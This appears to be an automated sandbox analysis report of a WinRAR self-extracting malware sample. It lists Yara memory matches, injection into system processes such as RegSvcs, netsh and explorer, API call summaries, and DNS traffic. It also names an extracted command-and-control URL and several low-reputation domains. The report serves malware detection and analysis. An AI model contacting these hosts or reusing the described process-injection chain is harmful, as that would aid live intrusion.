              Source: Yara matchFile source: 00000012.00000002.2628887806.0000000002A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000003.1994918677.000000000169A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.1632670112.0000000001030000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000003.1778571483.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000003.1994440354.000000000169A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000003.1784873248.0000000000E34000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000025.00000002.2032446289.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000003.1781279846.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000003.1914895579.0000000001A12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000003.1993986799.00000000016C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000003.1779088648.0000000000DE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000003.1917625527.00000000019DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000003.1995504017.000000000169A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000003.1785265319.000000000378C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000003.1779323188.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000003.1785169179.0000000000D7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.1633266545.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000003.1913572826.00000000019E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000003.1995901696.0000000004154000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.1823176871.0000000000FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.1631433911.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.1631393564.0000000000FBD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000003.1994684726.000000000170D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.1632049860.000000000102C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000003.1916791732.00000000019B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000003.1785668153.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000003.1995504017.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000003.1778617142.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000013.00000002.1690629152.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000003.1784873248.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.1632049860.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.1824428727.0000000000950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.1633788753.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.1631481618.0000000001018000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000003.1996380159.000000000166A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.1632478090.0000000001030000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000003.1913693018.0000000001A3C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.1633303654.0000000003827000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000003.1995598062.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000003.1914595785.0000000001A11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.1632707847.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.1954404710.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000003.1993881319.000000000166B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000003.1779404808.0000000000E42000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000021.00000002.1954501729.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000003.1995831269.000000000163D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000003.1994589968.00000000016E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000003.1914843943.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000003.1778666606.0000000000E06000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000003.1785086182.0000000000E37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.1632126525.0000000001062000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000003.1917367387.00000000042CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.1666060455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000003.1993929850.0000000001699000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000003.1914324145.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.2628367776.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000003.1913627559.0000000001A0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.2628964763.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: M1Y6kc9FpE.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: M1Y6kc9FpE.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: M1Y6kc9FpE.exe, 00000000.00000003.1381988723.00000000060D0000.00000004.00000020.00020000.00000000.sdmp, M1Y6kc9FpE.exe, 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp, M1Y6kc9FpE.exe, 00000000.00000003.1382771447.00000000069E8000.00000004.00000020.00020000.00000000.sdmp, M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
              Source: Binary string: ipconfig.pdb source: RegSvcs.exe, 0000000F.00000002.1666954416.00000000011F0000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.1666834363.00000000010B8000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000012.00000002.2628758777.0000000000A70000.00000040.80000000.00040000.00000000.sdmp
              Source: Binary string: ipconfig.pdbGCTL source: RegSvcs.exe, 0000000F.00000002.1666954416.00000000011F0000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.1666834363.00000000010B8000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000012.00000002.2628758777.0000000000A70000.00000040.80000000.00040000.00000000.sdmp
              Source: Binary string: cmmon32.pdb source: RegSvcs.exe, 0000001E.00000002.1950106186.0000000001368000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000001F.00000002.1949032877.0000000001790000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 0000001F.00000002.1947884202.00000000012A7000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000020.00000002.1954829620.0000000000790000.00000040.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000021.00000002.1954301901.0000000000790000.00000040.80000000.00040000.00000000.sdmp
              Source: Binary string: netsh.pdb source: RegSvcs.exe, 00000017.00000002.1819510620.0000000001194000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.1819510620.0000000001177000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000018.00000002.1818119289.0000000001175000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000018.00000002.1818782095.00000000014D0000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 00000018.00000002.1818119289.0000000001157000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000019.00000002.1824871414.00000000015C0000.00000040.80000000.00040000.00000000.sdmp, netsh.exe, 0000001A.00000002.1823588566.00000000015C0000.00000040.80000000.00040000.00000000.sdmp
              Source: Binary string: cmmon32.pdbGCTL source: RegSvcs.exe, 0000001E.00000002.1950106186.0000000001368000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000001F.00000002.1949032877.0000000001790000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 0000001F.00000002.1947884202.00000000012A7000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000020.00000002.1954829620.0000000000790000.00000040.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000021.00000002.1954301901.0000000000790000.00000040.80000000.00040000.00000000.sdmp
              Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 0000000F.00000000.1631580371.0000000000C42000.00000002.00000001.01000000.0000000C.sdmp, explorer.exe, 00000011.00000002.2648732198.000000001064F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000012.00000002.2629282852.0000000002C52000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000012.00000002.2631520313.00000000035EF000.00000004.10000000.00040000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1809597797.0000000000D72000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 0000000F.00000002.1667342795.0000000001640000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000012.00000002.2630215494.000000000323E000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000012.00000002.2630215494.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000012.00000003.1668765170.0000000002EF4000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000012.00000003.1666757118.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1687030423.0000000004AC4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1691063135.0000000004FBE000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1689172550.0000000004C76000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1691063135.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000019.00000003.1819075958.00000000012E9000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000019.00000002.1824957210.0000000003790000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000019.00000003.1823176512.00000000035E7000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000019.00000002.1824957210.000000000392E000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 0000001A.00000003.1821135657.0000000003925000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 0000001A.00000002.1823794267.0000000003C6E000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 0000001A.00000003.1817988527.000000000377F000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 0000001A.00000002.1823794267.0000000003AD0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000020.00000002.1955124284.0000000004660000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000020.00000002.1955124284.00000000047FE000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000020.00000003.1948767641.000000000430C000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000020.00000003.1952398893.00000000044B9000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000021.00000003.1952399233.00000000048DF000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000021.00000003.1948262742.000000000472C000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000021.00000002.1955122203.0000000004C2E000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: netsh.pdbGCTL source: RegSvcs.exe, 00000017.00000002.1819510620.0000000001194000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.1819510620.0000000001177000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000018.00000002.1818119289.0000000001175000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000018.00000002.1818782095.00000000014D0000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 00000018.00000002.1818119289.0000000001157000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000019.00000002.1824871414.00000000015C0000.00000040.80000000.00040000.00000000.sdmp, netsh.exe, 0000001A.00000002.1823588566.00000000015C0000.00000040.80000000.00040000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000F.00000002.1667342795.0000000001640000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000012.00000002.2630215494.000000000323E000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000012.00000002.2630215494.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000012.00000003.1668765170.0000000002EF4000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000012.00000003.1666757118.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1687030423.0000000004AC4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1691063135.0000000004FBE000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1689172550.0000000004C76000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1691063135.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000019.00000003.1819075958.00000000012E9000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000019.00000002.1824957210.0000000003790000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000019.00000003.1823176512.00000000035E7000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000019.00000002.1824957210.000000000392E000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 0000001A.00000003.1821135657.0000000003925000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 0000001A.00000002.1823794267.0000000003C6E000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 0000001A.00000003.1817988527.000000000377F000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 0000001A.00000002.1823794267.0000000003AD0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000020.00000002.1955124284.0000000004660000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000020.00000002.1955124284.00000000047FE000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000020.00000003.1948767641.000000000430C000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000020.00000003.1952398893.00000000044B9000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000021.00000003.1952399233.00000000048DF000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000021.00000003.1948262742.000000000472C000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000021.00000002.1955122203.0000000004C2E000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: rundll32.pdb source: RegSvcs.exe, 00000010.00000002.1686794971.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.1686542352.0000000001548000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1690754288.0000000000D80000.00000040.80000000.00040000.00000000.sdmp
              Source: Binary string: rundll32.pdbGCTL source: RegSvcs.exe, 00000010.00000002.1686794971.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.1686542352.0000000001548000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1690754288.0000000000D80000.00000040.80000000.00040000.00000000.sdmp
              Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 0000000F.00000000.1631580371.0000000000C42000.00000002.00000001.01000000.0000000C.sdmp, explorer.exe, 00000011.00000002.2648732198.000000001064F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000012.00000002.2629282852.0000000002C52000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000012.00000002.2631520313.00000000035EF000.00000004.10000000.00040000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1809597797.0000000000D72000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCode function: 0_2_00A2F826 __EH_prolog3_GS,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00A2F826
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCode function: 0_2_00A41630 __EH_prolog3_GS,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,0_2_00A41630
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCode function: 0_2_00A51FF8 FindFirstFileExA,0_2_00A51FF8
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_0059E387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,8_2_0059E387
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_0059D836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,8_2_0059D836
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_0059DB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,8_2_0059DB69
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_005A9F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,8_2_005A9F9F
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_005AA0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,8_2_005AA0FA
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_005AA488 FindFirstFileW,Sleep,FindNextFileW,FindClose,8_2_005AA488
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_005A65F1 FindFirstFileW,FindNextFileW,FindClose,8_2_005A65F1
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_0056C642 FindFirstFileExW,8_2_0056C642
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_005A7248 FindFirstFileW,FindClose,8_2_005A7248
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_005A72E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,8_2_005A72E9
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 4x nop then pop esi15_2_0041724B

              Networking

              barindex
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: www.ybokiesite.online/o52o/
              Performs DNS queries to domains with low reputation
              Source: DNS query: www.reon-network.xyz
              Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.8:58145
              Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.8:49706
              Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.8:58146
              Source: unknownDNS traffic detected: query: www.arehouse-inventory-62571.bond replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: www.inlinlong.top replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: www.reon-network.xyz replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: 212.20.149.52.in-addr.arpa replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: www.lladinco.online replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: 18.31.95.13.in-addr.arpa replaycode: Name error (3)
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_005AD7A1 InternetReadFile,SetEvent,GetLastError,SetEvent,8_2_005AD7A1
              Source: global trafficDNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa
              Source: global trafficDNS traffic detected: DNS query: 212.20.149.52.in-addr.arpa
              Source: global trafficDNS traffic detected: DNS query: www.arehouse-inventory-62571.bond
              Source: global trafficDNS traffic detected: DNS query: www.lladinco.online
              Source: global trafficDNS traffic detected: DNS query: www.inlinlong.top
              Source: global trafficDNS traffic detected: DNS query: www.reon-network.xyz
              Source: explorer.exe, 00000011.00000000.1639216371.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2639211861.000000000927B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2287154479.000000000927A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2284256993.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1639216371.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2284256993.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
              Source: M1Y6kc9FpE.exe, 00000000.00000003.1410420987.0000000006ABA000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1585732871.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1543300339.0000000000F9B000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1732739684.0000000000D78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
              Source: M1Y6kc9FpE.exe, 00000000.00000003.1410420987.0000000006ABA000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1585732871.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1543300339.0000000000F9B000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1732739684.0000000000D78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
              Source: M1Y6kc9FpE.exe, 00000000.00000003.1410420987.0000000006ABA000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1585732871.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1543300339.0000000000F9B000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1732739684.0000000000D78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
              Source: M1Y6kc9FpE.exe, 00000000.00000003.1410420987.0000000006ABA000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1585732871.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1543300339.0000000000F9B000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1732739684.0000000000D78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
              Source: M1Y6kc9FpE.exe, 00000000.00000003.1410420987.0000000006ABA000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1585732871.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1543300339.0000000000F9B000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1732739684.0000000000D78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
              Source: explorer.exe, 00000011.00000000.1639216371.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2639211861.000000000927B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2287154479.000000000927A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2284256993.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1639216371.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2284256993.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
              Source: explorer.exe, 00000011.00000000.1639216371.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1639216371.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2639211861.000000000927B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2287154479.000000000927A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2284256993.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2639211861.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2284256993.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1639216371.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2284256993.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
              Source: explorer.exe, 00000011.00000000.1636922085.0000000004405000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2632812909.0000000004405000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ns.adobeS
              Source: explorer.exe, 00000011.00000000.1639216371.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2639211861.000000000927B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2287154479.000000000927A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2284256993.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1639216371.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2284256993.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
